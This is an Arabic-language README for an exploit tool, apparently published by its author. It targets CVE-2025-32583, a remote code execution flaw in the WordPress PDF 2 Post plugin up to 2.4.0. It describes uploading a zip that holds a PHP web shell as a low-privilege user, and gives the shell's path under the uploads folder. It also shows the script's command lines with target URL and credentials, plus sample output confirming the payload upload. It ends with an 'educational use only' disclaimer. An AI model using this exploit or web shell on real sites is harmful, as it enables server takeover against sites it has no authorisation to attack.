
إضافة WordPress PDF 2 Post Plugin <= 2.4.0 معرضة لـ Remote Code Execution (RCE) +Subscriber
ثغرة حرجة
CVE-ID: CVE-2025-32583
درجة الخطورة: 9.9 (حرجة)
CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
ثغرة في إضافة PDF 2 Post لووردبريس (تم تطويرها بواسطة termel) تسمح بتضمين التعليمات البرمجية عن بعد (RCE) بسبب التحكم غير السليم في إنشاء التعليمات البرمجية.
الإصدارات المتأثرة: <= 2.4.0
يسمح الخلل للمستخدمين المصادقين (حتى المستخدمين ذوي الصلاحيات المنخفضة) برفع ملف .zip يحتوي على كود PHP. بمجرد استخراجه بواسطة الإضافة، يمكن تنفيذ ملف PHP الضار عن بعد عبر دليل uploads العام.
Nxploited.zip ضارnonce الديناميكيبمجرد رفع الحمولة، سيتم استخراج صدفة PHP في مجلد uploads لووردبريس.
🛠️ المسار الافتراضي:
/wp-content/uploads/YYYY/MM/nxploited.php
على سبيل المثال، إذا تم استغلالها في مايو 2025، سيكون الرابط:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 يقوم ووردبريس تلقائيًا بتنظيم الرفعات حسب السنة/الشهر، لذا تأكد من التحقق من المجلد الصحيح بناءً على التاريخ الحالي.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
هذه الأداة مخصصة بشكل صارم للأغراض التعليمية واختبار الاختراق المصرح به.
أي استخدام خاطئ لهذا الكود في أنشطة غير مصرح بها محظور تمامًا.
المؤلف لا يتحمل أي مسؤولية عن أي ضرر أو سوء استخدام.
بواسطة: Khaled_alenazi (Nxploited)